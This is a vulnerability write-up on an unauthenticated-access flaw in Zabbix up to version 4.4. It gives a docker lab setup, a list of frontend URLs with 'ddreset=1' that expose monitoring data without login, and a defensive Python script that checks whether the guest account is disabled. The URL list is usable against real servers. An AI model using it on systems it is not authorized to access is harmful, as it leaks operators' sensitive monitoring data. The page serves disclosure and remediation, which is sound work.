# Zabbix Unauthorized Access Vulnerability

## Vulnerability description

Zabbix has an unauthorized access vulnerability: through it, an attacker can read data on the Zabbix server without authenticating, leading to the disclosure of sensitive information.

## Affected versions

Zabbix <= 4.4

## Environment setup

```
docker run -p 10051:10051  -p 80:80 zabbix/zabbix-appliance:ubuntu-4.0.12
```

## Exploitation

Visit: <http://192.168.32.183/zabbix.php?action=problem.view&ddreset=1>

![image-20220726150813375](https://3435151113-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F7n39F0laH6bbmYKdILcq%2Fuploads%2Fgit-blob-74a30c9b5f522f6ad5d935cc435a31fd21dd1b82%2Fimage-20220726150813375.png?alt=media)

Visit: <http://192.168.32.183/overview.php?ddreset=1>

![image-20220726150910028](https://3435151113-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F7n39F0laH6bbmYKdILcq%2Fuploads%2Fgit-blob-c96ab3b8e2f7e71d9603ff9a795aab37534a5703%2Fimage-20220726150910028.png?alt=media)

Visit: <http://192.168.32.183/latest.php?ddreset=1>

![image-20220726150855422](https://3435151113-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F7n39F0laH6bbmYKdILcq%2Fuploads%2Fgit-blob-d12296e3165c42726095983736db265fc588b7d8%2Fimage-20220726150855422.png?alt=media)

The following links are also accessible:

* <https://TARGET/zabbix/zabbix.php?action=dashboard.view>
* <https://TARGET/zabbix/zabbix.php?action=dashboard.view&ddreset=1>
* <https://TARGET/zabbix/zabbix.php?action=problem.view&ddreset=1>
* <https://TARGET/zabbix/overview.php?ddreset=1>
* <https://TARGET/zabbix/zabbix.php?action=web.view&ddreset=1>
* <https://TARGET/zabbix/latest.php?ddreset=1>
* <https://TARGET/zabbix/charts.php?ddreset=1>
* <https://TARGET/zabbix/screens.php?ddreset=1>
* <https://TARGET/zabbix/zabbix.php?action=map.view&ddreset=1>
* <https://TARGET/zabbix/srv_status.php?ddreset=1>
* <https://TARGET/zabbix/hostinventoriesoverview.php?ddreset=1>
* <https://TARGET/zabbix/hostinventories.php?ddreset=1>
* <https://TARGET/zabbix/report2.php?ddreset=1>
* <https://TARGET/zabbix/toptriggers.php?ddreset=1>
* <https://TARGET/zabbix/zabbix.php?action=dashboard.list>
* <https://TARGET/zabbix/zabbix.php?action=dashboard.view&dashboardid=1>
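The pages listed above are viewable without logging in because the built-in `guest` account of the Zabbix frontend is enabled by default in these versions; the remediation is to disable that account (in the frontend, Administration, Users, move `guest` into the `Disabled` group, or into a group whose frontend access is set to disabled). The script below is an added example for checking that state on your own instance through the Zabbix JSON-RPC API; it is not part of the original write-up. The API URL, the `Admin` credentials, the sample `user.get` responses and the group IDs 8 and 9 in them are placeholders and constructed data.

```python
import json
import urllib.request

# Zabbix user-group flag values (as documented in the Zabbix API reference).
GUI_ACCESS_DISABLED = 3     # gui_access: group members cannot use the frontend
USERS_STATUS_DISABLED = 1   # users_status: group members are disabled

# Constructed sample responses in the shape user.get returns with
# selectUsrgrps; they are not captured from a real server.
SAMPLE_GUEST_ENABLED = [
    {"userid": "2", "alias": "guest",
     "usrgrps": [{"usrgrpid": "8", "name": "Guests",
                  "gui_access": "0", "users_status": "0"}]},
]
SAMPLE_GUEST_DISABLED = [
    {"userid": "2", "alias": "guest",
     "usrgrps": [{"usrgrpid": "8", "name": "Guests",
                  "gui_access": "0", "users_status": "0"},
                 {"usrgrpid": "9", "name": "Disabled",
                  "gui_access": "0", "users_status": "1"}]},
]


def guest_is_blocked(users):
    """Decide from a user.get result whether the 'guest' account can reach
    the frontend. Blocked means: the account does not exist, or at least one
    of its groups is disabled or has frontend access disabled (Zabbix applies
    the most restrictive group setting to the user)."""
    if not users:
        return True
    for user in users:
        for group in user.get("usrgrps", []):
            if int(group.get("users_status", 0)) == USERS_STATUS_DISABLED:
                return True
            if int(group.get("gui_access", 0)) == GUI_ACCESS_DISABLED:
                return True
    return False


def zabbix_call(api_url, method, params, auth=None, rpc_id=1):
    """Minimal JSON-RPC 2.0 client for the Zabbix API (standard library only)."""
    payload = {"jsonrpc": "2.0", "method": method, "params": params, "id": rpc_id}
    if auth is not None:
        payload["auth"] = auth
    request = urllib.request.Request(
        api_url, data=json.dumps(payload).encode("utf-8"),
        headers={"Content-Type": "application/json-rpc"})
    with urllib.request.urlopen(request, timeout=15) as response:
        body = json.load(response)
    if "error" in body:
        raise RuntimeError(f"{method} failed: {body['error']}")
    return body["result"]


def audit_guest_account(api_url, admin_user, admin_password):
    """Log in as an administrator, fetch the guest user with its groups and
    report whether guest access is blocked. In Zabbix <= 4.4 user.login takes
    the 'user' parameter (later versions renamed it to 'username')."""
    token = zabbix_call(api_url, "user.login",
                        {"user": admin_user, "password": admin_password})
    try:
        users = zabbix_call(api_url, "user.get", {
            "filter": {"alias": "guest"},
            "selectUsrgrps": ["usrgrpid", "name", "gui_access", "users_status"],
        }, auth=token)
    finally:
        zabbix_call(api_url, "user.logout", [], auth=token)
    return guest_is_blocked(users)


if __name__ == "__main__":
    # Placeholder URL and credentials: replace with those of your own instance.
    blocked = audit_guest_account("http://ZABBIX_HOST/api_jsonrpc.php",
                                  "Admin", "ADMIN_PASSWORD")
    print("guest access is blocked" if blocked else
          "guest account is enabled: add it to the 'Disabled' group")
```

Run it before and after the change to the `guest` account; once it reports the account as blocked, the pages above answer with a redirect to the login form instead of data. The decision logic is kept in `guest_is_blocked` so it can be exercised against stored API responses without a live server.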
